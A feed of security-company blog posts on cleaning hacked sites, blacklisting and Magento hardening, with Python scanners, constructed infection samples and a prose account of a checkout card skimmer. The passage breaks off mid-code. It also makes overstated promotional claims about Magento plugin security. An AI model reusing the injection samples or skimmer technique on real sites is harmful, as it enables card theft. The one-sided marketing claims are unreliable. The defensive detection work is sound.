Website Protection – Security Blog
https://blog.siteguarding.com

The Imperative Need to Keep Your Website Free from Blacklists and Viruses: A Comprehensive Guide
https://www.siteguarding.com/security-blog/the-imperative-need-to-keep-your-website-free-from-blacklists-and-viruses-a-comprehensive-guide/
Wed, 24 Apr 2024 10:56:16 +0000

In the digital age, maintaining a website that is free from blacklists and viruses is not just an option, but a necessity. This article aims to shed light on the importance of keeping your website clean and secure, focusing on the dangers of harmful content and the benefits of using Website Blacklist Removal services.

The digital landscape is fraught with potential dangers, with cyber threats evolving at an alarming rate. One of the most common issues faced by website owners is the presence of harmful content. This can include pages that attempt to deceive visitors into sharing personal information or downloading software that could potentially harm their systems. Such content not only poses a risk to your visitors but also tarnishes your website’s reputation.

The phrase “This site is unsafe” is a chilling warning that no website owner wants to see. This warning is often displayed by web browsers when they detect potentially harmful content on a website. It is a clear indication that your website has been blacklisted, a situation that can lead to a significant decrease in traffic and a potential loss of business.

Understanding the Consequences of Blacklisting

When a website is blacklisted, it is essentially flagged as unsafe by search engines and web security services. This can happen for a variety of reasons, including the presence of malware, phishing attempts, or spammy content. Once a website is blacklisted, it becomes difficult for users to access it, as their browsers will display warnings about the site’s safety.

The impact of blacklisting can be severe. It can lead to a significant drop in website traffic, as potential visitors are deterred by safety warnings. This can, in turn, lead to a loss of business and revenue. Moreover, being blacklisted can also damage your website’s reputation, making it harder to regain the trust of your visitors even after the issue has been resolved.

The Importance of Keeping Your Website Clean

Keeping your website free from harmful content is crucial for several reasons. Firstly, it ensures the safety of your visitors. By ensuring that your website does not contain any pages that try to trick visitors into sharing personal info or downloading software, you are protecting them from potential harm.

Secondly, maintaining a clean website helps to preserve your website’s reputation. A website that is known for being safe and secure is more likely to attract and retain visitors. On the other hand, a website that is known for containing harmful content is likely to be avoided.

Lastly, keeping your website clean can also help to improve its search engine ranking. Search engines like Google prioritize the safety and security of their users. As such, they are more likely to rank websites that are free from harmful content higher in their search results.

The Role of Website Blacklist Removal Services

Given the potential consequences of blacklisting, it is crucial to address the issue as soon as possible. This is where Website Blacklist Removal services come in. These services are designed to help website owners remove their websites from blacklists and restore their reputation.

Website Blacklist Removal services typically involve a comprehensive scan of your website to identify any harmful content or security vulnerabilities. Once these issues have been identified, the service provider will work to resolve them. This can involve removing harmful content, cleaning up any malware infections, and securing your website to prevent future issues.

Moreover, these services also often include assistance with submitting a review request to search engines and web security services. This is a crucial step in the process, as it can help to expedite the removal of your website from blacklists.

In conclusion, keeping your website free from blacklists and viruses is of paramount importance. It not only ensures the safety of your visitors but also helps to preserve your website’s reputation and improve its search engine ranking. By using Website Blacklist Removal services, you can effectively address any issues and ensure that your website remains safe and secure.

How to Remove Malicious Code, Viruses, and Backdoors from Your Website
https://www.siteguarding.com/security-blog/how-to-remove-malicious-code-viruses-and-backdoors-from-your-website/
Wed, 03 Apr 2024 12:48:37 +0000

Malicious code can cause significant damage to your website and business reputation. It can lead to data breaches, loss of customer trust, and even legal issues. Therefore, it’s crucial to regularly scan your website for malicious code and remove it promptly.

In this article, we will discuss how to remove malicious code, viruses, and backdoors from your website. We will cover the following topics:

  1. Understanding Malicious Code, Viruses, and Backdoors
  2. Signs of a Compromised Website
  3. Steps to Remove Malicious Code, Viruses, and Backdoors
  4. Preventing Future Attacks
  5. Conclusion

  1. Understanding Malicious Code, Viruses, and Backdoors

Malicious code refers to any code that is designed to harm a website or server. It can include scripts, iframes, and other types of code that cybercriminals inject into a website to steal data, redirect visitors, or spread malware.

Viruses are a type of malicious code that can replicate itself and infect other files or systems. They can cause significant damage to a website, including data corruption, system crashes, and loss of functionality.

Backdoors are a type of malicious code that provides cybercriminals with unauthorized access to a website or server. They can be used to steal data, modify files, or launch further attacks.

  2. Signs of a Compromised Website

Before you can remove malicious code, viruses, and backdoors from your website, you need to identify whether your website has been compromised. Here are some signs of a compromised website:

  • Unusual traffic patterns, such as a sudden spike or drop in traffic
  • Unexpected changes to your website’s content or design
  • Unauthorized users or accounts in your website’s admin panel
  • Slow website performance or frequent crashes
  • Search engine warnings or blacklisting
  • Customer complaints about unusual behavior or suspicious activity on your website

  3. Steps to Remove Malicious Code, Viruses, and Backdoors

If you suspect that your website has been compromised, follow these steps to remove malicious code, viruses, and backdoors:

Step 1: Backup Your Website

Before you start the cleanup process, backup your website’s files and database. This will ensure that you can restore your website if anything goes wrong during the cleanup process.

Step 2: Identify the Malicious Code

Use a malware scanner to scan your website’s files and database for malicious code. There are many malware scanners available, both free and paid, such as Sucuri, Wordfence, and SiteLock.

Step 3: Remove the Malicious Code

Once you have identified the malicious code, remove it from your website’s files and database. This can be a complex and time-consuming process, especially if the malicious code is embedded in multiple files.

If you are not comfortable removing the malicious code yourself, consider hiring a professional website security service to do it for you.

Step 4: Change Your Passwords

Change all passwords associated with your website, including admin panel passwords, FTP passwords, and database passwords. This will prevent cybercriminals from regaining access to your website.

Step 5: Update Your Website’s Software

Update your website’s software, including CMS, plugins, and themes, to the latest version. This will patch any vulnerabilities that cybercriminals may have exploited to inject the malicious code.

Step 6: Monitor Your Website

Monitor your website for any signs of reinfection. Use a malware scanner to regularly scan your website’s files and database for malicious code.
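
Steps 2 and 6 can be backed by a file-integrity baseline taken right after cleanup and compared on every later scan. The following Python is an added example, not code from the original article or from any of the scanners named above; the detection rules, the `uploads` directory name and the sample files are assumptions constructed for illustration.

```python
import hashlib
import os
import re
import tempfile

# Heuristic content rules (assumed for this example, not a complete signature set).
CONTENT_RULES = {
    # eval() wrapped around a decoder is a common way to hide injected PHP.
    "obfuscated-eval": re.compile(
        rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # Zero-sized iframes are used to load third-party content invisibly.
    "hidden-iframe": re.compile(
        rb"<iframe[^>]+(width|height)\s*=\s*[\"']?0\b", re.I),
}
TEXT_EXTENSIONS = (".php", ".phtml", ".inc", ".js", ".html", ".htm")
PHP_EXTENSIONS = (".php", ".phtml")
UPLOAD_DIR = "uploads"  # assumed name of the directory that should hold media only


def snapshot(root):
    """Map every file under root (relative path) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_snapshots(baseline, current):
    """Return the files added, removed and modified since the baseline."""
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def scan_tree(root):
    """Return {relative path: [rule names]} for files that match a heuristic."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TEXT_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, "rb") as fh:
                data = fh.read()
            hits = [rule for rule, rx in CONTENT_RULES.items() if rx.search(data)]
            # Executable PHP inside a media upload directory is suspicious by location alone.
            if UPLOAD_DIR in rel.split(os.sep)[:-1] and name.lower().endswith(PHP_EXTENSIONS):
                hits.append("php-in-upload-dir")
            if hits:
                findings[rel] = sorted(hits)
    return findings


def demo_integrity():
    """Build a constructed sample site, baseline it, simulate reinfection, report."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, UPLOAD_DIR))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'home'; ?>\n")
        with open(os.path.join(root, UPLOAD_DIR, "logo.png"), "wb") as fh:
            fh.write(b"\x89PNG constructed placeholder")
        baseline = snapshot(root)  # taken once the site is known to be clean

        # Constructed reinfection; the encoded string is harmless ("echo 1;").
        with open(os.path.join(root, "index.php"), "a") as fh:
            fh.write('<iframe src="http://example.invalid/" width="0" height="0"></iframe>\n')
        with open(os.path.join(root, UPLOAD_DIR, "cache.php"), "w") as fh:
            fh.write('<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n')

        return diff_snapshots(baseline, snapshot(root)), scan_tree(root)


if __name__ == "__main__":
    changes, findings = demo_integrity()
    print("changes since baseline:", changes)
    print("heuristic findings:", findings)
```

Store the baseline outside the web root so that an attacker who can write to the site cannot also rewrite it.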

  4. Preventing Future Attacks

Preventing future attacks is crucial to maintaining your website’s security. Here are some best practices to follow:

  • Keep your website’s software up to date
  • Use strong passwords and change them regularly
  • Limit user access to your website’s admin panel
  • Use a firewall to block malicious traffic
  • Regularly scan your website for malicious code
  • Educate your employees about website security best practices
  • Consider hiring a professional website security service to monitor and protect your website

  5. Conclusion

Removing malicious code, viruses, and backdoors from your website is a complex and time-consuming process. However, it’s crucial to maintaining your website’s security and protecting your business reputation.

By following the steps outlined in this article, you can remove malicious code from your website and prevent future attacks. Remember to regularly scan your website for malicious code, keep your website’s software up to date, and follow website security best practices.

Investing in a professional website security service can also provide peace of mind and ensure that your website is protected against cyber threats.

FAQs

  1. How do I know if my website has been compromised?

Signs of a compromised website include unusual traffic patterns, unexpected changes to your website’s content or design, unauthorized users or accounts in your website’s admin panel, slow website performance or frequent crashes, search engine warnings or blacklisting, and customer complaints about unusual behavior or suspicious activity on your website.

  2. How can I remove malicious code from my website?

To remove malicious code from your website, backup your website’s files and database, identify the malicious code using a malware scanner, remove the malicious code from your website’s files and database, change all passwords associated with your website, update your website’s software to the latest version, and monitor your website for any signs of reinfection.

  3. How can I prevent future attacks on my website?

To prevent future attacks on your website, keep your website’s software up to date, use strong passwords and change them regularly, limit user access to your website’s admin panel, use a firewall to block malicious traffic, regularly scan your website for malicious code, educate your employees about website security best practices, and consider hiring a professional website security service to monitor and protect your website.

  4. Can I remove malicious code from my website myself?

Removing malicious code from your website can be a complex and time-consuming process, especially if the malicious code is embedded in multiple files. If you are not comfortable removing the malicious code yourself, consider hiring a professional website security service to do it for you.

  5. How often should I scan my website for malicious code?

You should scan your website for malicious code regularly, ideally daily. This will help you detect and remove malicious code before it causes significant damage to your website and business reputation.

  6. What is a backdoor in website security?

A backdoor is a type of malicious code that provides cybercriminals with unauthorized access to a website or server. It can be used to steal data, modify files, or launch further attacks.

  7. How can I protect my website from viruses?

To protect your website from viruses, keep your website’s software up to date, use strong passwords and change them regularly, limit user access to your website’s admin panel, use a firewall to block malicious traffic, regularly scan your website for malicious code, educate your employees about website security best practices, and consider hiring a professional website security service to monitor and protect your website.

  8. How can I secure my website’s admin panel?

To secure your website’s admin panel, limit user access to only those who need it, use strong passwords and change them regularly, implement two-factor authentication, and regularly scan your website for malicious code.

  9. What is a malware scanner?

A malware scanner is a tool that scans your website’s files and database for malicious code. It can help you detect and remove malicious code from your website.

  10. How can I recover my website after a malware attack?

To recover your website after a malware attack, backup your website’s files and database, identify the malicious code using a malware scanner, remove the malicious code from your website’s files and database, change all passwords associated with your website, update your website’s software to the latest version, and monitor your website for any signs of reinfection. Consider hiring a professional website security service to assist with the recovery process.

SiteGuarding CY Ltd. is a Top-Rated Web Development & Security Services Agency!
https://www.siteguarding.com/security-blog/top-rated-clutch/
Tue, 28 Jan 2020 11:34:56 +0000

What sets SiteGuarding CY Ltd. apart is that we not only develop cutting-edge websites, but also ensure that they’re protected against unknown viruses and threats. In today’s digital age, we know that a well-developed, aesthetically-pleasing website isn’t enough; as cyber-attacks become more sophisticated and prolific, a website must also be fully secure.

We develop the highest-grade security tools to provide maximum website protection, without exception. With 10+ years of experience and 50+ IT professionals, we’re well-equipped to deliver groundbreaking software solutions. We’ve worked with businesses of all sizes across a variety of industries, delivering a personal approach to every customer and every project.

We’re excited to announce that we recently began partnering with Clutch, a B2B platform and reputable connector of buyers and sellers. We appreciate receiving feedback from clients so that we can continuously improve our processes, and we also know that client reviews are helpful to those interested in our services.

Our most recent review on Clutch came from an office and home solutions company that contracted us to make sure their website complied with the EU’s General Data Protection Regulation (GDPR). We came on board and, upon checking their website, found some core problems with the code. We fixed those issues and made changes to the site to make it quicker and more functional. Our team also helped reduce the amount of spam that the company was receiving.

We continue to provide 24/7 protection, and the client reports that they’re “completely happy” with our services and the results we’ve delivered. They’re pleased that the website now works well and is even bringing them more leads.

Another 5-star review came from Egroup Services Ltd., a web design, development, and information security company. They didn’t have enough time or expertise to deliver on certain projects, so they hired us as an outsourcing partner.

We’ve contributed to a number of projects for them, and we’ve become their go-to resource for e-commerce development. For example, Egroup needed to build an e-commerce site for a wine company, but they weren’t familiar with their CMS, so we created an independent payment gateway for the site. For another project that was especially complex, we helped create an online app for 3D models of naval ships and architectural designs.

“They’ve done an excellent job—they’re professional and reliable. Our clients are always happy, so we’re happy. I’ve tested their work a few times too, and it’s always solid.” — CEO, Egroup Services Ltd.

Having worked with unreliable freelancers in the past, Egroup reports that our project management capabilities have exceeded expectations. Since they also maintain a high level of tech expertise, they’re pleased to know that we’re delivering quality work to their clients.

We’re thankful to our clients for helping us establish a positive online presence and digital reputation, and we look forward to collecting more reviews on Clutch! If you have any questions about our past work or the services we provide, please don’t hesitate to reach out.

What to Do if Your Site Has Been Hacked
https://www.siteguarding.com/security-blog/if-your-site-has-been-hacked/
Tue, 10 Dec 2019 14:11:17 +0000

Every webmaster at one point or another has to face the fact of their website being hacked. If you haven’t had this kind of problem yet, then you’ve either been using a custom CMS or have just recently started working with sites. In this article, we will go point by point through what you need to do if your site has been hacked or if malicious code has been inserted into your site.

Relax, it’s not that bad

First of all, you shouldn’t panic or do anything rash. Webmasters frequently rush to restore a backup copy of their site and thereby lose the content that they’ve posted over the preceding days. There’s nothing wrong with doing this, except for one “but”: the site is restored, but the backdoor through which the site was hacked isn’t closed. This means that it is only a matter of time until your site is hacked again and you have to face the same problem all over again.

There is no need to panic or make rash decisions. You just need to get out of the situation with minimal losses and act so as to ensure that your site will be an impregnable fortress to hackers in the future.

Contact your hosting provider

First and foremost, find out from your hosting provider whether your site could have been hacked because of a server vulnerability. If you use regular hosting and not a dedicated server, then it is entirely possible that the hack came through one of your hosting neighbors. In other words, the hacker gained access to one of the client sites on the same server as yours, and thereby gained administrative rights to the whole server. When a hacker gets administrative rights, they can install a virus on any website on the whole server.

Find out from your hosting provider whether the server has software that lets you scan your site for malicious code. Many hosting providers buy antivirus protection for their servers from us so that their clients can check their sites for viruses for free. But in most cases things are still a little different: most hosting providers either do not use antivirus software at all, or use free versions which are very ineffective.

Tell your hosting provider that you are aware of the virus and are already working on getting rid of it. This is necessary because many hosts, upon seeing a virus on a client site, simply block and disconnect the site from their network. As a result, you might lose clients and search engine positions while your site is unavailable.

Ask your hosting provider whether their administrators can help you delete the virus from your site. It is possible that your hosting provider offers such a service and you just don’t know about it.

Restore an earlier version of your site

If you have backed up your site at least once a week, then it should be no problem for you to simply restore a copy of the site from before it had malware injected. This is the easiest way to eliminate a virus and then install additional site protection.

Check your work computer for viruses

According to our statistics, 20% of site hacks occur due to negligence towards the security of one’s work PC or employees’ computers. If you use Windows at your workplace, be sure to install a firewall (WAF – Web Application Firewall) and antivirus. Check your computer and employees’ computers for viruses, and then consider transferring your employees working on the site to Linux or Unix OS.

Change passwords

The most cunning hackers know that as soon as you detect a hack and unauthorized access to your site, the first thing you’ll do is change all your passwords. So they create additional users within the site administration, and sometimes inside the cPanel. Make sure that you do not have new administrators and FTP accounts, and if you do find them, simply delete them.

Templates, modules, and plugins

Go to the administrative section of your CMS and view the installed modules. Delete all the ones you don’t need. Attention: don’t simply deactivate them, but delete them from the hosting so that these modules’ files aren’t on your server. Check whether the plugins you need are updated to the latest versions. If you haven’t updated them in a while, be sure to check with the developer what the latest version is and update them. A lot of Magento Extension Development companies warn you if your website has extensions that are not up to date.

Do the same with your templates. If you only use one version of a template on the site, then delete all the unneeded ones and update the ones you need to their latest version.

Google Webmaster (Search Console)

If you still haven’t installed Google Search Console, then be sure to do so. Check whether there are any notifications for you. Both Google and MSN generally send notifications when their algorithms detect a virus on sites. If you have notifications, be sure to contact both after you delete the viruses. Then, submit a request to review your site.

Indexed Pages

Open Google and type in the search bar site:site_name.com. View all the pages in the MSN and Google indexes. If you find any unknown pages, send a request to have them removed through Google or MSN Webmaster.

To quickly block spam pages, you can use the robots.txt file, which is located in the root folder of your site and is available at your_site.com/robots.txt. Open the file in your favorite text editor and add the following lines for all robots:

User-agent: *
Disallow: /spam.php
Disallow: /hacked/malware.html
Disallow: /malware_folder/

Naturally, instead of the above pages, you should specify the pages you found in the search results. These rules only ask crawlers not to fetch the listed URLs; the spam files themselves still have to be deleted from the server.

Here is an example of Japanese spam which is installed on hacked user sites:

[Image: example of Japanese spam]

Find and eliminate viruses on the site

It should be added that simply deleting malicious code is not enough. You need to find out how your site was hacked and where the vulnerability is on your site, so as to protect yourself from future hacks. Note that if you have more than one site on a hosting account, you need to check all of them for viruses and vulnerabilities. If an attacker gained access to one of your sites, it is likely that malicious code is also hidden in the others.
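
One way to start answering how the site was hacked is to pivot from a file the scan flagged to the web server access log: find which client first requested that file, then list what the same client did just before. The Python below is an added example, not part of the original article; it assumes the common combined log format, and the log lines, IP addresses (documentation ranges) and paths such as `/plugins/gallery/upload.php` are constructed.

```python
import re
from datetime import datetime

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample log; /uploads/cache.php stands for a file the scan flagged.
SAMPLE_LOG = """\
198.51.100.20 - - [09/Dec/2019:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Dec/2019:10:02:11 +0000] "GET /plugins/gallery/readme.txt HTTP/1.1" 200 812 "-" "curl/7.58"
203.0.113.7 - - [09/Dec/2019:10:02:15 +0000] "POST /plugins/gallery/upload.php HTTP/1.1" 200 64 "-" "curl/7.58"
203.0.113.7 - - [09/Dec/2019:10:02:19 +0000] "POST /uploads/cache.php HTTP/1.1" 200 12 "-" "curl/7.58"
198.51.100.20 - - [09/Dec/2019:10:05:00 +0000] "POST /contact.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Dec/2019:10:06:40 +0000] "POST /uploads/cache.php?a=1 HTTP/1.1" 200 12 "-" "curl/7.58"
"""


def parse_access_log(text):
    """Parse log text into time-ordered events; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"].split("?", 1)[0],  # compare paths without query string
            "status": int(m["status"]),
        })
    return sorted(events, key=lambda e: e["ts"])


def requests_before_first_touch(events, malicious_paths):
    """For each IP that requested a flagged file, list its earlier successful requests."""
    first_touch = {}
    for e in events:
        if e["path"] in malicious_paths and e["ip"] not in first_touch:
            first_touch[e["ip"]] = e["ts"]
    trails = {ip: [] for ip in first_touch}
    for e in events:
        cutoff = first_touch.get(e["ip"])
        if cutoff is not None and e["ts"] < cutoff and e["status"] < 400:
            trails[e["ip"]].append((e["method"], e["path"], e["status"]))
    return trails


def likely_entry_requests(trails):
    """Last successful POST per IP before the flagged file was first requested.

    This is a lead to investigate (which component handled that request and
    whether it is outdated), not proof of the vulnerability.
    """
    result = {}
    for ip, reqs in trails.items():
        posts = [path for method, path, _status in reqs if method == "POST"]
        if posts:
            result[ip] = posts[-1]
    return result


def demo_log_trace():
    events = parse_access_log(SAMPLE_LOG)
    trails = requests_before_first_touch(events, {"/uploads/cache.php"})
    return trails, likely_entry_requests(trails)


if __name__ == "__main__":
    trails, entry = demo_log_trace()
    print("requests before first touch:", trails)
    print("likely entry request:", entry)
```

On shared hosting the logs may be rotated or held by the provider, so request copies covering the period before the first detection.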

Conclusion

It doesn’t matter which CMS you use or what traffic your site has, you should always devote time to the security of your resources. Ensuring site security is just as complicated and difficult work as is building or promoting a site in search systems. It takes time and energy, but modern reality is such that if you don’t dedicate enough time to securing your server, you will most likely lose time searching for and deleting viruses and restoring sites following a hack.

Magento vs WordPress: which is the most secure?
https://www.siteguarding.com/security-blog/magento-vs-wordpress-which-is-the-most-secure/
Thu, 18 Jan 2018 12:29:33 +0000

Magento is still the most popular ecommerce platform. It’s known as the most trusted platform, with a high level of functionality and customizability. WordPress is currently considered the fastest growing CMS. Initially it was associated with blogs, because its main functionality is aimed at easy blog keeping. Still, its developers have succeeded in turning it into a perfectly good content management system.

Magento or WordPress? This is a question which, like many similar ones, has no right answer. It depends on which goals you would like to achieve.

If your primary aim is to sell products via online stores, it will definitely be better for you to choose the Magento platform. The truth is that this Magento 2 Cloud CMS is specially created for trading through the Internet. On the other hand, if you are not interested in ecommerce and would just like to create and post some amazing content, WordPress is what you actually need.

WordPress is traditionally famous for its plugins. Besides its own extensions, WordPress offers multiple third-party plugins. But there is one sad fact: the security of such third-party products is up in the air. And this is the main point you should take into consideration when choosing WordPress for ecommerce.

At the same time, Magento doesn’t need any additional plugins itself. Its native functionality is enough for creating secure stores. But as a rule, the owners of major businesses always try to empower their stores and install different extensions with useful features. By the way, all the Magento plugins meet the highest security requirements.

Security is what vendors worry about first of all. The first reason is that their customers make online payments and should be assured that their confidential information is under strong protection. So, what makes Magento the most secure platform for ecommerce?

  • Security patches and timely notification

According to the Magento Security Center, they released 7 security patches in 2015 and two more in 2016. Everyone who has joined their security alert registry is informed about security updates immediately, so vendors always know what else they can do to provide the highest protection for their stores.

  • Free tool for scanning

If you miss some security news, or simply as a preventive measure, you can always scan your Magento website for free. There is a special tool for scanning and detecting vulnerabilities, so you can be sure your website is protected.

  • Availability of multiple security plugins

There is a great number of Magento security extensions. They can estimate limits or block threats, scan for vulnerabilities, strengthen passwords, and scan for changed files. Some of them can be downloaded from Magento Connect or reliable third-party websites.

By the way, you need to be careful with Magento 2 extensions and Magento themes. Those which are pulled down from the Magento Marketplace/Connect are the ones mostly subject to cyber attack. Also remember about updates, and always use up-to-date versions of Magento plugins and Magento templates.

When choosing the best option for your business, pay attention to the following. Although WordPress is easy to use, simple to customize and flexible enough, Magento is a key player in the market of ecommerce platforms. The reason is not only its extended functionality, which allows creating a store from scratch; its main advantage is a high level of security. WordPress-based websites, by contrast, are the most vulnerable to attack. They have no reliable protection system comparable to Magento’s, which always deals with payments and personal data storage.

10+1 Tips How to Improve the Security of Your Magento 2 Store
https://www.siteguarding.com/security-blog/101-tips-how-to-improve-the-security-of-your-magento-2-store/
Tue, 31 Oct 2017 05:48:11 +0000

Security is an issue that should never be ignored by online merchants, and Magento 2 stores are no exception to this rule. In this article, we will give you some useful tips on how the security of your Magento 2 store can be improved. So, let’s start.

Update Your Magento 2 to the Latest Version

The Magento team regularly releases updates of its platform by adding new features and improving the old ones, in particular, the security issues. So, check for the latest updates from time to time to provide your web store with the latest protection solutions.

Use Reliable Magento 2 Extensions

The reason why Magento 2 extensions are so popular is that they allow enhancing the basic functionality of this platform. However, before installing any extension, make sure that this extension is provided by a truly reliable developer, not some defrauder. In addition, it’s recommended to download Magento 2 extensions from trustworthy resources, such as the Magento Marketplace site.

Create Encrypted Connection

If the data are transferred through an unencrypted connection, there is the risk that this data can be intercepted. However, this problem can be prevented by configuring secure URLs right in your Magento 2 Admin Panel.

To perform the configuration, go to Stores > Configuration. In the Configuration menu, expand the Web option. In the panel opened, find the Base URL (Secure) section and expand it. Here, you can configure the URLs to establish the encrypted connection.

Use Two-factor Authentication

As a rule, a secure Magento 2 password is not the guarantee of complete website protection from hacker attacks. Consider using two-factor authentication to further improve the security of your Magento 2 store and protect yourself from password-related risks that may appear in the future.

Create Backup Files

Make sure that you have a backup version of all your web store files in case your store is hacked. The possibilities of Magento 2 Cloud Solution allow you to backup the entire database of your site, including the system and media files.

To perform the backup, in your Magento 2 Admin Panel, click on System and choose Backups in the Tools section. In the panel opened, you can manage the backup process of your files. After the configuration is completed, apply changes by clicking on the Save Config button.

Take Care of Your Email Address

Magento 2 automatically configures e-mail addresses through which users can easily recover their passwords. Still, if your email ID was hacked, your Magento 2 store becomes subjected to hacker attacks. So, make sure that the email address given by Magento is not publicly known (change it if needed) and protected with the two-factor authentication.

Limit Admin Access

To ensure that the Admin Panel of your store can be accessed from a particular IP address, just restrict the admin access in your Magento 2 settings. First, click System in your Magento 2 Admin Panel and choose User Roles in the Permissions section. In the panel opened, you can manage user roles in your store by clicking on the Add New Role button and ascribing the corresponding roles for particular user IDs.

Enable Admin Login CAPTCHA

CAPTCHA is the technology that prevents hackers and even bots from accessing the database of your site. You can enable this technology in your Magento 2 Admin Panel.

First, click on Stores in the Admin Panel and choose Configuration in the Settings section. In the Configuration menu opened, expand the Advanced section and choose Admin. On the page opened, expand the CAPTCHA section. Here, you can enable the CAPTCHA feature for your web store and configure its settings. Don’t forget to save the configured settings by clicking on the Save Config button.

Configure Action Log

If you use Magento 2 Commerce Edition, you can track the store admin activity through the Action Log feature. To enable the feature, in your Magento 2 Admin Panel, open Stores and choose Configuration in the Settings section. In the menu opened, expand the Advanced tab and choose Admin.

In the window opened, expand the Admin Actions Logging section. Here, you can configure the Action Log settings. When the configuration is completed, save changes.

Use Security Review Services

Magento security experts can give you useful recommendations on how to increase the protection of your store. Still, their tips do not always help to solve all the issues that you are dealing with. That’s why it’s recommended to use special services for analyzing web sites for potential security breaches at least once a year. By performing such checks, you can decide how the security of your store can be further improved.

Bonus Tip

The Magento 2 community, which is always ready to help you with any security issues you face, grows constantly. More importantly, community members regularly release security reports related to the latest versions of Magento 2. So, visit Magento Forums to keep up with the latest Magento 2 security information!

Conclusion

The protection of a web store from hacker attacks should be the number one priority for Magento 2 store owners. Use the tips given in the article to reinforce your site’s protection and leave no chance for hackers that may try to breach your security.

6 Tips How To Improve Magento Security
https://www.siteguarding.com/security-blog/6-tips-how-to-improve-magento-security/
Sat, 07 Oct 2017 21:34:51 +0000

When working with a Magento-based website, you will be surprised by the number of built-in security features. But safety is vital, and additional measures to make your website safer are worth taking. Let’s look at what I suggest:

  1. Stay ahead of Magento security updates. Magento developers are working their socks off to provide merchants with a more powerful security system. They try to consider all possible risks and prevent them from happening. As a result, new Magento versions are packed with features and software that address detected security risks.
  2. Don’t be rash! Avoid simple passwords that include your date of birth and similar details. Use random combinations of letters and digits and change them regularly. And don’t use the same or slightly similar passwords for multiple accounts. This is the best protection whatever CMS you use, including for accounts that are not related to your store.
  3. If you are the happy owner of a large business, you need more people involved in running the store. This considerably increases the risk of a break-in. It’s a mistake to give access to all administrative staff. It’s more reasonable for them to use different user accounts.
  4. In the ocean of Magento extension development companies, choose only thoroughly vetted extension developers. It’s good to test something new, and in general experimenting is the best way to select the most suitable things. But remember that when security is at stake, it’s better to skip the experiments and choose well-tried products.
  5. You know that failures (equipment failure, staff mistakes, force majeure, etc.) kill business. So you should always have a backup of your data. Ideally, you keep more than one backup and back up your website data regularly. This will directly help you restore your website in case of a security breach.
  6. Let two-factor authentication become a habit. A random password is good, but it doesn’t guarantee that experienced hackers will never discover even a well-made password. Sending a login code to a mobile device is a good and widespread practice. It protects your store from unauthorized logins.

What other measures may be taken to keep a website protected? I’m looking forward to your personal recommendations! See you soon!

Why Magento Security is Important
https://www.siteguarding.com/security-blog/why-magento-security-is-important/
Wed, 26 Jul 2017 11:13:54 +0000

The content management system Magento was developed in the US in 2007 by the well-known company Varien. The free CMS Magento is open-source software, built on the Zend Framework, and runs on a UNIX operating system. The CMS is primarily suitable for developing large online stores. There are already over 100,000 online resources on this platform all over the world.

Opportunities and features of Magento

Based on a single Magento platform, you can instantly create several Internet resources and manage them at the same time, which is very convenient for administration. The catalog system is well structured, and products can be compared. Free management of prices for goods, stock additions and gift certificates makes working with the system convenient both for the site administrator and for the buyer, who can choose goods at a discount and sort them according to certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to HTML code management; the possibility to add meta tags (description and keywords) for each product or category; a custom ending of the site address for each product; and an XML sitemap for search engines that Magento generates itself. Magento provides a multicurrency and currency conversion system. This is a convenient function for customers, regardless of the country in which they are located.

If you want to run your online store on Magento without using templates, you will need knowledge of HTML markup and CSS styles. However, to work with this CMS, it is best to hire a specialist in this field.

In addition to the platform, free and paid modules are provided that expand the functions of the CMS. It is recommended to check all free modules in a test environment first, as many of them are of low quality. For paid modules, free technical support from the developers is offered.

So, Magento CMS is a solid and high-quality platform, which is great for creating an online store. In some ways, it can be difficult for an inexperienced user, but its capabilities are much wider than those of other similar platforms. And if a function is missing from the basic configuration, you can connect additional modules: at the moment there are more than four thousand different extensions.

Magento Security

The most common recent way of exploiting a hacked Magento site is the installation of a spy script that tracks forms and sends the values entered in them to the hacker. This way the hacker gets access to the data of the bank cards with which customers pay for purchases in the store, as well as the personal data of the cardholder. That is, all the values that the buyer enters when placing an order.

The script is loaded on any page of the store, but it is active only where sensitive data is entered. Usually, the addresses of these pages contain the fragments “onepage”, “checkout”, “onestep”, which mark the ordering pages.
The script extracts data from the form fields (input, select, textarea, checkbox), builds a message from them and sends it to the attacker’s site through ajax.
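The behaviour described above can be turned into a review heuristic for scripts found on a store. The following is an added example, not code from the original article: the function names, the sample scripts and the hosts `shop.example` and `collector.example` are constructed for illustration.

```python
import re

# URL fragments the article names as typical of ordering pages.
CHECKOUT_FRAGMENTS = ("onepage", "checkout", "onestep")
# Bulk selection of the form controls the article lists.
FIELD_QUERY = re.compile(
    r"""(?:querySelectorAll|getElementsByTagName|\$|jQuery)\s*\(\s*['"][^'"]*\b(?:input|select|textarea)\b""")
# Common ways for a script to send data in the background ("ajax").
SEND_CALL = re.compile(
    r"\$\.(?:ajax|post)|jQuery\.(?:ajax|post)|XMLHttpRequest|\bfetch\s*\(|sendBeacon")
HOST_IN_URL = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


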